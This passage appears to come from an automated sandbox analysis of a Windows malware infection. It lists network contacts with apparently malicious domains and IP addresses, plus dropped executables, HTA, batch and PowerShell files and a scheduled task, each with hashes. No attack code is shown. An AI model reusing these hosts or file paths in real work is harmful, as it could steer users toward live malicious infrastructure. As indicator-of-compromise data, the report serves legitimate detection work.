US 104.21.9.123:443 moderzysics.top tcp
US 172.67.192.128:443 biochextryhub.bet tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 104.21.9.123:443 moderzysics.top tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
N/A 127.0.0.1:55566 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
CH 185.208.156.162:80 185.208.156.162 tcp

Files

memory/2020-0-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-1-0x0000000077594000-0x0000000077596000-memory.dmp

memory/2020-2-0x00000000003B1000-0x0000000000411000-memory.dmp

memory/2020-3-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-4-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-5-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-6-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-7-0x00000000003B1000-0x0000000000411000-memory.dmp

memory/2020-8-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-9-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/2020-10-0x00000000003B0000-0x00000000006CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Y4EY0F07LU5BLDPGTU34X9.exe

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/1956-14-0x0000000000770000-0x0000000000C2C000-memory.dmp

memory/2020-17-0x00000000003B0000-0x00000000006CA000-memory.dmp

memory/1956-18-0x0000000000771000-0x000000000079F000-memory.dmp

memory/1956-19-0x0000000000770000-0x0000000000C2C000-memory.dmp

memory/1956-20-0x0000000000770000-0x0000000000C2C000-memory.dmp

memory/2232-34-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/1956-33-0x0000000000770000-0x0000000000C2C000-memory.dmp

memory/2232-35-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-36-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-37-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-38-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-39-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/1812-57-0x0000018D0E960000-0x0000018D0E972000-memory.dmp

memory/1812-58-0x0000018D0ED20000-0x0000018D0ED30000-memory.dmp

memory/2232-59-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-60-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-61-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-62-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\E34B.tmp\E34C.tmp\E34D.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/2408-79-0x0000014F103B0000-0x0000014F103D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tgqio2px.uih.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/4080-117-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2232-116-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\ed16c1310c.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

memory/4080-137-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tGOAsdxdd.hta

MD5 d201212df8db5946c1bf5311775bb1b7
SHA1 f7f6c2bac67fbc2fb8c08bc61d4e483aad5700f0
SHA256 f8086d50dc738d63535754819ec3ca2d9bfada1279206589c8d41202eae51f88
SHA512 2b9319f1c9323332a9ba4f5af637607090f038adfb3d7417172f22bf85e172e0f0fedabb3f67b36853d735ae19c7df293776fb06d65c90208a8ac0e35fa4fac1

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/3452-154-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2500-153-0x00000000047B0000-0x00000000047E6000-memory.dmp

memory/2500-156-0x0000000004E20000-0x0000000005448000-memory.dmp

memory/2500-157-0x0000000004D60000-0x0000000004D82000-memory.dmp

memory/2500-158-0x0000000005640000-0x00000000056A6000-memory.dmp

memory/2500-159-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/2500-170-0x0000000005720000-0x0000000005A74000-memory.dmp

memory/2500-171-0x0000000005D10000-0x0000000005D2E000-memory.dmp

memory/2500-172-0x0000000005D50000-0x0000000005D9C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2500-182-0x0000000007640000-0x0000000007CBA000-memory.dmp

memory/2500-183-0x0000000006250000-0x000000000626A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 70595b5937369a2592a524db67e208d3
SHA1 d989b934d9388104189f365694e794835aa6f52f
SHA256 be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8
SHA512 edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

C:\Users\Admin\AppData\Local\Temp\installer.ps1

MD5 b6d611af4bea8eaaa639bbf024eb0e2d
SHA1 0b1205546fd80407d85c9bfbed5ff69d00645744
SHA256 8cd3bf95cedcf3469d0044976c66cbf22cd2fecf21ae4f94986d7211d6ba9a2b
SHA512 d8a4ec5bd986884959db3edfd48e2bf4c70ead436f81eab73b104aa0ff0f5dadfb6227cb2dab1f979f0dbb3aafbc1889ed571fb6e9444a09ae984b789314463d

memory/2500-210-0x00000000071E0000-0x0000000007276000-memory.dmp

memory/2500-211-0x0000000007170000-0x0000000007192000-memory.dmp

memory/2500-215-0x0000000008270000-0x0000000008814000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\14dhhefq\14dhhefq.cmdline

MD5 df19fd66c8dadf654564b289ad46e88f
SHA1 a0875dccb9765150c30d11dea51232933bdc6912
SHA256 72bf544314ed2d3c9c6daabe5cbdb7de4c1ebcf4edd710cabc4f9141a503754f
SHA512 b73499f5399550dad30b0f98616587f18201b86d45b59078a1cae4e9c78eddbc074b5d5a65f9180056fa0ecce02134d7aca9dad8f06bfc1f5c7235af904e887d

\??\c:\Users\Admin\AppData\Local\Temp\14dhhefq\14dhhefq.0.cs

MD5 1809fe3ba081f587330273428ec09c9c
SHA1 d24ea2ea868ae49f46c8a7d894b7fda255ec1cd9
SHA256 d07a0c5fdf0862325608791f92273e0fc411c294f94d757f1ff0303ba5e03457
SHA512 e662420fc93a5cefd657f7701432924e6a06482ea147ad814d5e20b16b2f3c13ed2cc6b9caf24c22b7a5b24ad0aa1d216c5804c46d2250522cfc2cadc69f9e28

memory/5096-227-0x0000000000CA0000-0x000000000115C000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\14dhhefq\CSC16BBA28762344C99B0BD8DC1F95B47F.TMP

MD5 1424ba514beb7a2a42badfa1d8e2ca4b
SHA1 cfabf9a3363e4e172aee873f0f077254959dc1ba
SHA256 78e4b7fda3669a9077676f18e9640c0e91f7cce0bd08f014c7240f82547bca8b
SHA512 4160e16515b51bb64f097a72f0a71e5ef9b6d79a89c520dd13e158649725af5427743976c33a556570fcd4dc7e9dd0c831b9bfe75bb933161c3f13c1657482a9

C:\Users\Admin\AppData\Local\Temp\RES25D3.tmp

MD5 40edf7269cd1a342156ad9018b02f1d1
SHA1 16cbb0a76b786da80052339eaaaa92492c2372ad
SHA256 134a232d60db3d882d5889d86ffed1082b91d0e10da541cb118fcebe3a8a2ef8
SHA512 adf0e1f18adc5e22e6ceb1cfe6402eecf334e2f2ed90a71ebe96d5eaa03e1906e8e06fdba70a3edd1b104117d69a47509a91e7cf685f4b9d5fdd7f846cec9a51

C:\Users\Admin\AppData\Local\Temp\14dhhefq\14dhhefq.dll

MD5 b3c92f7cb66245745a3fa77701e2aa27
SHA1 77ec5b3bedc26e29822182ec4bd7f55fa0bfb05c
SHA256 830234ead51ada6345f0073ec9264a7d1df7d0bc21d666e829f4924bbce1bb92
SHA512 7bca81c89b70daea1356109a783c8572e1747e8e25d845406ec74b86e492cab94f4f2da83c5aa655d6714cc98be8049b416d081455503a2c9fdbe7974a0b7900

memory/1944-235-0x000001F85B4B0000-0x000001F85B4B8000-memory.dmp

memory/3480-237-0x000000000E590000-0x000000000EE13000-memory.dmp

memory/5096-239-0x0000000000CA0000-0x000000000115C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1420b171a9c3d8eab9d05257fa0b574b
SHA1 c065b61f7926f4e5b58cd87791cc3858f9a155dd
SHA256 e63c2c01055c9aec4fb16224164dcd9b62c74e62308fd12fb4f32d0f1816eaa9
SHA512 468463fe25887736d0634eef900f6370a92014fa9bf34ce5858aa399e46937f654e993ed5a78f8e1d0cc201c0f92a1967a8cacc126150fd8a8257e3ff6558731

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 73825c8ae78faf19833db374e5c43b12
SHA1 28ea6ec53c79368359bdaabcf71bc79ca4f4f211
SHA256 1e91133bada620645f1d373c316c3e7a1c525fef5128af153d13fa9317a9a474
SHA512 11ddee91e82556c9ed4ef3bf11a4ce85f1d51905d6f82a8232258f58763a81ac5781fb0b65804a91ed1f30c71c5852ba96a12870a4baa9a94f353c47f4eed8c3

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/1896-260-0x0000000005D00000-0x0000000006054000-memory.dmp

memory/1896-262-0x0000000006300000-0x000000000634C000-memory.dmp

memory/2232-265-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/5036-267-0x0000000005990000-0x0000000005CE4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dea580edae5cf0d5f0219500e1506b3e
SHA1 783bf19f9cc1d72cc6b805da716bfce85fa80100
SHA256 a53fed1e3720449a0f3df0c3a6354701419dbdb270bb2f896582e99aba2766e2
SHA512 56ba7156d2bb87ac704a190d4da31f027ffaa9e9634c53cd851f3346285e0ec5dbb204069931a2c0846cc35717b8c29c7bb8cc5e05bbb334ceb8d8e42356cdf1

memory/1812-278-0x0000018D29310000-0x0000018D29838000-memory.dmp

C:\Temp\1zsFbOQ8w.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/3452-282-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4520-292-0x0000000006030000-0x0000000006384000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f85ad821c39f9081c6a6bb3705354955
SHA1 d760c475d85343b47fc394d06fb5fb2a83cde107
SHA256 3f56c8476157903ab46dfde5fa6d2e50843d19a540de0b96b2ee3b5dc0788343
SHA512 770f48feebec4fdceb9e042a96480ebafed6b649283c6480687fc4063a8755784b2eb9d4c4ca0125100fe606593b48cb960a84fac715ca2f566b7c12a8e2202b

memory/4520-294-0x0000000006A80000-0x0000000006ACC000-memory.dmp

memory/1052-303-0x0000000000770000-0x0000000000C2C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108910101\a35996f1e0.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/1052-313-0x0000000000770000-0x0000000000C2C000-memory.dmp

memory/4644-320-0x0000000000180000-0x0000000000B6D000-memory.dmp

memory/2232-322-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 64a9b9a019e10bb1eabb84600b86c4c7
SHA1 e2722c2094c2d9e46b1872f50c41a649dcf6bc4c
SHA256 4b552954d5a9d3534e55cc17d3fcb3669d869c376d610b387fbb76ede9459081
SHA512 c5e882c25de152973308f2a95af47f2b074308f75812f80305d80ff1b5886c68e91333fd8d97aecb0e085f6973899243a626b95d20a603d392fc376173073e74

C:\Users\Admin\AppData\Local\Temp\10108920101\a9cf5477f3.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1036-352-0x0000000000F00000-0x0000000000F78000-memory.dmp

memory/4548-355-0x0000000000400000-0x0000000000465000-memory.dmp

memory/4548-357-0x0000000000400000-0x0000000000465000-memory.dmp

memory/3452-358-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4700-359-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-360-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-369-0x000001941D250000-0x000001941D270000-memory.dmp

memory/4700-368-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-371-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-373-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-372-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-370-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4700-374-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4644-375-0x0000000000180000-0x0000000000B6D000-memory.dmp

memory/4644-376-0x0000000000180000-0x0000000000B6D000-memory.dmp

memory/2280-377-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2280-378-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4644-380-0x0000000000180000-0x0000000000B6D000-memory.dmp

memory/2232-381-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108930101\cfd0e5d249.exe

MD5 84ada09d9801547265d6589b50051295
SHA1 fa842424381715851e8d8d716afb27da31edd8c1
SHA256 a02496bfd7675a37043304198ee5b9efb075376e4ef1509fbbd5e83e190211f6
SHA512 4158f0c6409b7b11ee6023b5d295bc77ba3b82de54dd72de08c58bf2521f76ed52167b54395e35929dbb67f857205401eb262cf71c982d7e03823894f1f8037f

memory/4700-391-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4260-399-0x00000000005E0000-0x0000000001213000-memory.dmp

memory/2280-401-0x0000000010000000-0x000000001001C000-memory.dmp

memory/3452-405-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108940101\53f03cc464.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/4800-423-0x0000000000F60000-0x00000000013F5000-memory.dmp

memory/1812-422-0x0000018D28EE0000-0x0000018D28F88000-memory.dmp

memory/4800-425-0x0000000000F60000-0x00000000013F5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I86J5WJL\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2232-427-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/4260-430-0x00000000005E0000-0x0000000001213000-memory.dmp

memory/4700-429-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4260-431-0x00000000005E0000-0x0000000001213000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108950101\bdc4900b3c.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
SHA256 015e79df6eee2266ce0fc395c2be08f750970312c9d0e1e6a7cff757ae63f43e
SHA512 a109d05f074d3407c09e66d9bcb2f8dd19811b73b6538b4f92edee17183f22d87faea63b1a09ed831c9c297e6fa729b61d0ad0bf81629f7fb7a08d0288cb04f4

memory/3452-439-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4260-447-0x00000000005E0000-0x0000000001213000-memory.dmp

memory/364-445-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108960101\1fd8abdc9d.exe

MD5 afc954940e0fc5ca6bdf390e0033a01c
SHA1 aa0193bc48197c86a7ce3401be6607f0e052a319
SHA256 07446af5c75f3b25664b5471d74e5e213eaf7372b14289a98a2c5e8ba01391e8
SHA512 b1da9863d5427b7ca7a4a33b63bef12cb21faff28e440c053be4034759c94ffb167d9c56f188ff0d6572eebf014b8b4ad928ba7e34229603289f1c5541b80148

memory/1372-465-0x0000000000920000-0x0000000000FA8000-memory.dmp

memory/2232-472-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/1372-475-0x0000000000920000-0x0000000000FA8000-memory.dmp

memory/4700-478-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/3452-477-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108970101\3d86f4f105.exe

MD5 08552f5efe19801cc3fafe356dccd710
SHA1 29d2bff1b2ecc298c1cb0a95d3af0de7ee239af9
SHA256 16e6372a8712649b3c49c17f6d7103fe6f6a2c6dcf25a2d0759e43b33e2ec0b7
SHA512 17457315cdd235ed76d6f607e560784154b4f5a96ccc7ea1165cb62376600bf2a745afe6f4b722e2c3fb028df9b038f636730f2ec9709d78b15d719a7aad5e7d

memory/2440-511-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\Desktop\YCL.lnk

MD5 09edebfe74517b545e2dfe28b5318f38
SHA1 be74157ed5404729cf768c4110b81bc115daea51
SHA256 f839f127a609687e12d66b63b85de0ef00e081907c296af8e0a4ecc0172ddf7a
SHA512 be4593350099e62bb656b41eff5137c6351d862e4e1b9191e8773281b6d2609fbd1024ecd737978d0c268b5418d830b03b3729832d539cad565fe514b5f13b35

C:\Users\Admin\AppData\Local\Temp\wVD34wr3sueJdw5YfWEszw1A0f82E\Y-Cleaner.exe

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

memory/2260-517-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2232-516-0x0000000000440000-0x00000000008FC000-memory.dmp

memory/2440-519-0x0000000000440000-0x00000000008FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108980101\9c1fc92bca.exe

MD5 37259000abc86b85dbb65366443ec3c1
SHA1 b6cf0ac13b56918992c9c6daa38e791a40f60f88
SHA256 681d6b115beeb234904a4235c87e9eecc6c25f09aab5cc20a36d58a5df35148c
SHA512 866e4e4d2af9aa8657fa84c1bfa552cbedcb151dd25d3dd7871ad6c27bba599e515515f4cbbf4610477867af8fb3a8f9090c5fcd28034ebb9db42f56eb900695

memory/4700-537-0x00007FF7AF830000-0x00007FF7B00F4000-memory.dmp

memory/4124-538-0x0000000000880000-0x0000000000CCE000-memory.dmp

memory/4124-540-0x0000000000880000-0x0000000000CCE000-memory.dmp

memory/4124-541-0x0000000000880000-0x0000000000CCE000-memory.dmp

memory/3452-542-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3452-544-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 a21b7adfb784803e877649b4c8e52bc3
SHA1 3d7339496dab77ef9a92ef1a99884598e64e37d1
SHA256 243e8b24a91984a9c88f9d497d5439fde8a28f1b5da0df602225a16b99f12ac4
SHA512 afa227d9ce62a2bc38cc28d2bf35d926341454ed4660dd5d50c81499208ab18a64ae3801b358ae8e90db79cc56471a74d8d9c16d1c541c33acee2ef3301b1ed5

C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2460-567-0x0000000000180000-0x000000000048A000-memory.dmp

memory/2260-583-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4124-602-0x0000000000880000-0x0000000000CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\366b4d79-03d5-4271-843b-2635965e3802

MD5 d12343b0eed5af534db49a50c7d96e76
SHA1 65fc336e10f5592d6476b028e4668646545d345a
SHA256 58b1e06c758da3e33c7477cb5675ca19f714ffab510668d071611306d304a3c7
SHA512 13fafa0a3ac867f93f00bade13299406a37d241bd598a11418a3def8967f761e321fbba8cfe1c9545cc3303176b81452c3839ffa37716c5f1ae15f663673454b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 e75b8b675b70220c536db327ef0d5159
SHA1 df711e4308c48de50e4d6aab8d8ae523e55725fe
SHA256 cbd6f6f5ebcfee97ca0b4b408e12a88734f1b324c80873f058d6b6236218aee0
SHA512 68322435aef75a5184c62e000a87c333022617d4416e35149042ecece5f0e796e03806ae8af3fc31f68bf4356c2d0e321a166dabaafaf9c684bc4dd81103fa28

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\a1751298-c8b6-449d-87ce-762f48bbe24e

MD5 69ee9009187fc501e7a3ef04e61d2c3a
SHA1 ef5d50147dc5cf105833d45bf37cb2fc22987ce8
SHA256 9e19a098682a5a66eb73ba460d7cd78e29d38e44cd9c6b65d63a6613781bb360
